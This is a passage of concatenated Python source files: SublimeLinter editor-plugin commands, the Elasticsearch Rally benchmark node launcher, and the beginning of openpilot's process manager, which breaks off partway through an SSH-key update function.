os.remove(message_path)
with open(message_path, mode='w', encoding='utf-8') as f:
header = '{} {}'.format(
os.path.basename(path),
os.path.splitext(os.path.basename(message_path))[0])
f.write('{}\n{}\n'.format(header, '-' * (len(header) + 1)))
f.write(self.get_commit_messages_since(version))
self.window.run_command('open_file', args={'file': message_path})
except Exception:
import traceback
traceback.print_exc()
finally:
os.chdir(cwd)
def rewrite_messages_json(self, messages_path, tag):
"""Add an entry in messages.json for tag, return relative path to the file."""
with open(messages_path, encoding='utf-8') as f:
messages = json.load(f)
major, minor, release = tag
release += 1
tag = '{}.{}.{}'.format(major, minor, release)
message_path = os.path.join('messages', '{}.txt'.format(tag))
messages[tag] = message_path
message_path = os.path.join(os.path.dirname(messages_path), message_path)
with open(messages_path, mode='w', encoding='utf-8') as f:
messages_json = '{\n'
sorted_messages = []
if 'install' in messages:
install_message = messages.pop('install')
sorted_messages.append(' "install": "{}"'.format(install_message))
keys = sorted(map(self.sortable_tag, messages.keys()))
for _, key in keys:
sorted_messages.append(' "{}": "{}"'.format(key, messages[key]))
messages_json += ',\n'.join(sorted_messages)
messages_json += '\n}\n'
f.write(messages_json)
return message_path
def sortable_tag(self, tag):
"""Return a version tag in a sortable form."""
if tag == 'install':
return (tag, tag)
major, minor, release = tag.split('.')
if '+' in release:
release, update = release.split('+')
update = '+{:04}'.format(int(update))
else:
update = ''
return ('{:04}.{:04}.{:04}{}'.format(int(major), int(minor), int(release), update), tag)
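    # The zero padding above makes plain string sorting order versions numerically:
    # for example, sortable_tag('1.2.3') returns ('0001.0002.0003', '1.2.3') and
    # sortable_tag('1.2.3+4') returns ('0001.0002.0003+0004', '1.2.3+4'), so
    # '1.10.0' sorts after '1.9.0' when the entries are rewritten.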
def get_commit_messages_since(self, version):
"""Return a formatted list of commit messages since the given tagged version."""
tag = '{}.{}.{}'.format(*version)
output = util.communicate([
'git', 'log',
'--pretty=format:{{{{%w(0,0,0)%s %b}}}}',
'--reverse', tag + '..'
])
        # Split the messages; they are delimited by {{{{ }}}}
messages = []
for match in self.COMMIT_MSG_RE.finditer(output):
messages.append(match.group(1).strip())
# Wrap the messages
wrapper = TextWrapper(initial_indent='- ', subsequent_indent=' ')
messages = list(map(lambda msg: '\n'.join(wrapper.wrap(msg)), messages))
return '\n\n'.join(messages) + '\n'
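    # Each commit is emitted by git as '{{{{<subject> <body>}}}}'; COMMIT_MSG_RE then
    # extracts the text between the braces, and TextWrapper renders every message as
    # a hanging-indented bullet, for example:
    #
    #   - Fix a crash when linting views that
    #     have not been saved yet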
class SublimelinterClearColorSchemeFolderCommand(sublime_plugin.WindowCommand):
"""A command that clears all of SublimeLinter made color schemes."""
def run(self):
"""Run the command."""
base_path = os.path.join(sublime.packages_path(), 'User', '*.tmTheme')
sublime_path = os.path.join(sublime.packages_path(), 'User', 'SublimeLinter', '*.tmTheme')
themes = glob(base_path) + glob(sublime_path)
prefs = sublime.load_settings('Preferences.sublime-settings')
scheme = prefs.get('color_scheme')
for theme in themes:
            # Ensure it is an (SL) theme and it is not the current scheme
if re.search(r'\(SL\)', theme) and os.path.normpath(scheme) not in theme:
persist.debug('deleting {}'.format(os.path.split(theme)[1]))
os.remove(theme)
class SublimelinterClearCachesCommand(sublime_plugin.WindowCommand):
"""A command that clears all of SublimeLinter's internal caches."""
def run(self):
"""Run the command."""
util.clear_path_caches()
util.get_rc_settings.cache_clear()
util.find_file.cache_clear()
linter.Linter.clear_settings_caches()
class SublimelinterReportCommand(sublime_plugin.WindowCommand):
"""
A command that displays a report of all errors.
The scope of the report is all open files in the current window,
all files in all folders in the current window, or both.
"""
def run(self, on='files'):
"""Run the command. on determines the scope of the report."""
output = self.window.new_file()
output.set_name('{} Error Report'.format(persist.PLUGIN_NAME))
output.set_scratch(True)
from .sublimelinter import SublimeLinter
self.plugin = SublimeLinter.shared_plugin()
if on == 'files' or on == 'both':
for view in self.window.views():
self.report(output, view)
if on == 'folders' or on == 'both':
for folder in self.window.folders():
self.folder(output, folder)
def folder(self, output, folder):
"""Report on all files in a folder."""
for root, dirs, files in os.walk(folder):
for name in files:
path = os.path.join(root, name)
# Ignore files over 256K to speed things up a bit
if os.stat(path).st_size < 256 * 1024:
# TODO: not implemented
pass
def report(self, output, view):
"""Write a report on the given view to output."""
def finish_lint(view, linters, hit_time):
if not linters:
return
def insert(edit):
if not any(l.errors for l in linters):
return
filename = os.path.basename(linters[0].filename or 'untitled')
out = '\n{}:\n'.format(filename)
for lint in sorted(linters, key=lambda lint: lint.name):
if lint.errors:
out += '\n {}:\n'.format(lint.name)
items = sorted(lint.errors.items())
# Get the highest line number so we know how much padding numbers need
highest_line = items[-1][0]
width = 1
while highest_line >= 10:
highest_line /= 10
width += 1
for line, messages in items:
for col, message in messages:
out += ' {:>{width}}: {}\n'.format(line + 1, message, width=width)
output.insert(edit, output.size(), out)
persist.edits[output.id()].append(insert)
output.run_command('sublimelinter_edit')
kwargs = {'self': self.plugin, 'view_id': view.id(), 'callback': finish_lint}
from .sublimelinter import SublimeLinter
Thread(target=SublimeLinter.lint, kwargs=kwargs).start()
|
launcher.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster, java_resolver
from esrally.utils import process, jvm
def wait_for_rest_layer(es, max_attempts=20):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
            if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
                # the node is still starting up or not yet accepting connections - wait and retry
                time.sleep(1)
            elif e.status_code == 401:
                # security may still be initializing, so requests can be rejected temporarily - wait and retry
                time.sleep(1)
else:
raise e
return False
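# A minimal usage sketch for the readiness check above (illustrative only - Rally
# itself builds its clients via client.EsClientFactory, and the host below is an
# assumed example):
#
#   import elasticsearch
#   es = elasticsearch.Elasticsearch(hosts=[{"host": "127.0.0.1", "port": 9200}])
#   if not wait_for_rest_layer(es, max_attempts=40):
#       raise exceptions.LaunchError("Elasticsearch REST API did not become available in time.")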
class ClusterLauncher:
"""
The cluster launcher performs cluster-wide tasks that need to be done in the startup / shutdown phase.
"""
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
"""
Creates a new ClusterLauncher.
:param cfg: The config object.
:param metrics_store: A metrics store that is configured to receive system metrics.
:param client_factory_class: A factory class that can create an Elasticsearch client.
"""
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self):
"""
Performs final startup tasks.
Precondition: All cluster nodes have been started.
Postcondition: The cluster is ready to receive HTTP requests or a ``LaunchError`` is raised.
:return: A representation of the launched cluster.
"""
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
all_hosts = self.cfg.opts("client", "hosts").all_hosts
default_hosts = self.cfg.opts("client", "hosts").default
preserve = self.cfg.opts("mechanic", "preserve.install")
es = {}
for cluster_name, cluster_hosts in all_hosts.items():
all_client_options = self.cfg.opts("client", "options").all_client_options
cluster_client_options = dict(all_client_options[cluster_name])
# Use retries to avoid aborts on long living connections for telemetry devices
cluster_client_options["retry-on-timeout"] = True
es[cluster_name] = self.client_factory(cluster_hosts, cluster_client_options).create()
es_default = es["default"]
t = telemetry.Telemetry(enabled_devices, devices=[
telemetry.NodeStats(telemetry_params, es, self.metrics_store),
telemetry.ClusterMetaDataInfo(es_default),
telemetry.ClusterEnvironmentInfo(es_default, self.metrics_store),
telemetry.JvmStatsSummary(es_default, self.metrics_store),
telemetry.IndexStats(es_default, self.metrics_store),
telemetry.MlBucketProcessingTime(es_default, self.metrics_store),
telemetry.CcrStats(telemetry_params, es, self.metrics_store),
telemetry.RecoveryStats(telemetry_params, es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(default_hosts, [], t, preserve)
self.logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es_default, max_attempts=40):
self.logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
self.logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
self.logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
"""
Performs cleanup tasks. This method should be called before nodes are shut down.
:param c: The cluster that is about to be stopped.
"""
c.telemetry.detach_from_cluster(c)
class StartupWatcher:
def __init__(self, node_name, server, startup_event):
self.node_name = node_name
self.server = server
self.startup_event = startup_event
self.logger = logging.getLogger(__name__)
def watch(self):
"""
Reads the output from the ES (node) subprocess.
"""
lines_to_log = 0
while True:
line = self.server.stdout.readline().decode("utf-8")
if len(line) == 0:
self.logger.info("%s (stdout): No more output. Process has likely terminated.", self.node_name)
self.await_termination(self.server)
self.startup_event.set()
break
line = line.rstrip()
# if an error occurs, log the next few lines
if "error" in line.lower():
lines_to_log = 10
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not self.startup_event.isSet() or lines_to_log > 0:
self.logger.info("%s (stdout): %s", self.node_name, line)
lines_to_log -= 1
# no need to check as soon as we have detected node startup
if not self.startup_event.isSet():
if line.find("Initialization Failed") != -1 or line.find("A fatal exception has occurred") != -1:
self.logger.error("[%s] encountered initialization errors.", self.node_name)
# wait a moment to ensure the process has terminated before we signal that we detected a (failed) startup.
self.await_termination(self.server)
self.startup_event.set()
if line.endswith("started") and not self.startup_event.isSet():
self.startup_event.set()
self.logger.info("[%s] has successfully started.", self.node_name)
def await_termination(self, server, timeout=5):
# wait a moment to ensure the process has terminated
wait = timeout
        while server.returncode is None and wait > 0:
time.sleep(0.1)
server.poll()
wait -= 1
def _start(process, node_name):
log = logging.getLogger(__name__)
startup_event = threading.Event()
watcher = StartupWatcher(node_name, process, startup_event)
t = threading.Thread(target=watcher.watch)
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
log.error(msg)
raise exceptions.LaunchError(msg)
else:
log.info("Started node [%s] with PID [%s].", node_name, process.pid)
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
log.error(msg)
raise exceptions.LaunchError(msg)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name):
return _start(subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping Docker container running.")
else:
self.logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts").default
client_options = self.cfg.opts("client", "options").default
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
self.logger.info("Distribution version was not specified by user. Rally-determined version is [%s]", distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
self.logger.warning("Distribution version '%s' on command line differs from actual cluster version '%s'.",
user_defined_version, distribution_version)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
        # we're very specific about which nodes we kill, as there is potentially also an Elasticsearch-based metrics store running on this machine.
        # The only specific trait of a Rally-related process is that it is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
java_major_version, java_home = java_resolver.java_home(car, self.cfg)
self.logger.info("Starting node [%s] based on car [%s].", node_name, car)
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
node_telemetry = [
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
telemetry.StartupTime(self.metrics_store),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, java_home, t)
t.on_pre_node_start(node_name)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
self.logger.info("Attaching telemetry devices to node [%s].", node_name)
t.attach_to_node(node)
return node
def _prepare_env(self, car, node_name, java_home, t):
env = {}
env.update(os.environ)
env.update(car.env)
self._set_env(env, "PATH", os.path.join(java_home, "bin"), separator=os.pathsep)
# Don't merge here!
env["JAVA_HOME"] = java_home
self.logger.debug("env for [%s]: %s", node_name, str(env))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
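    # For example, with env == {"PATH": "/usr/bin"}, calling
    # self._set_env(env, "PATH", "/opt/jdk/bin", separator=os.pathsep) yields
    # env["PATH"] == "/opt/jdk/bin:/usr/bin" on POSIX systems (new entries are
    # prepended); a key that is not present yet is simply set to the given value.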
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
cmd = ["bin/elasticsearch"]
return _start(subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping [%d] nodes on this host running.", len(nodes))
else:
self.logger.info("Shutting down [%d] nodes on this host.", len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
try:
os.kill(process.pid, signal.SIGINT)
process.wait(10.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
except subprocess.TimeoutExpired:
# kill -9
self.logger.warning("Node [%s] did not shut down after 10 seconds; now kill -QUIT node, to see threads:", node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
break
try:
process.wait(120.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
break
except subprocess.TimeoutExpired:
pass
self.logger.info("kill -KILL node [%s]", node_name)
try:
process.kill()
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
node.telemetry.detach_from_node(node, running=False)
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
is_neos = os.path.isfile("/init.qcom.rc")
neos_update_required = False
if is_neos:
version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
revision = int(open("/REVISION").read()) if version >= 10 else 0 # Revision only present in NEOS 10 and up
neos_update_required = version < 10 or (version == 10 and revision != 3)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
updater_dir = os.path.join(BASEDIR, "installer", "updater")
manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import re
import stat
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.file_helpers import atomic_write_in_dir_neos
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"mapd": "selfdrive.mapd.mapd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.py"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
"gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
"updated": "selfdrive.updated",
}
daemon_processes = {
"athenad": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'paramsd',
'visiond',
'proclogd',
'ubloxd',
'gpsd',
#'mapd',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# terminate the zmq context since we forked
import zmq
zmq.Context.instance().term()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
        # can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name, params):
proc = daemon_processes[name]
pid_param = name.capitalize() + 'Pid'
pid = params.get(pid_param)
if pid is not None:
try:
os.kill(int(pid), 0)
# process is running (kill is a poorly-named system call)
return
except OSError:
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
cwd='/',
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
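# os.kill(pid, 0) above sends no signal at all; it only checks whether the pid can
# be signalled and raises OSError otherwise, which makes it a cheap liveness probe.
# A standalone version of the same idea (illustrative sketch only):
#
#   def pid_alive(pid):
#       try:
#           os.kill(pid, 0)
#       except OSError as e:
#           # EPERM means the process exists but belongs to another user
#           return e.errno == errno.EPERM
#       return True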
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock(service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p, params)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
#running_list = [" running %s %s" % (p, running[p]) for p in running]
#cloudlog.debug('\n'.join(running_list))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def update_ssh():
ssh_home_dirpath = "/system/comma/home/.ssh/"
auth_keys_path = os.path.join(ssh_home_dirpath, "authorized_keys")
auth_keys_persist_path = os.path.join(ssh_home_dirpath, "authorized_keys.persist")
auth_keys_mode = stat.S_IREAD | stat.S_IWRITE
params = Params()
github_keys = params.get("GithubSshKeys") or ''
old_keys = open(auth_keys_path).read()
has_persisted_keys = os.path.exists(auth_keys_persist_path)
if has_persisted_keys:
persisted_keys = open(auth_keys_persist_path).read()
else:
# add host filter
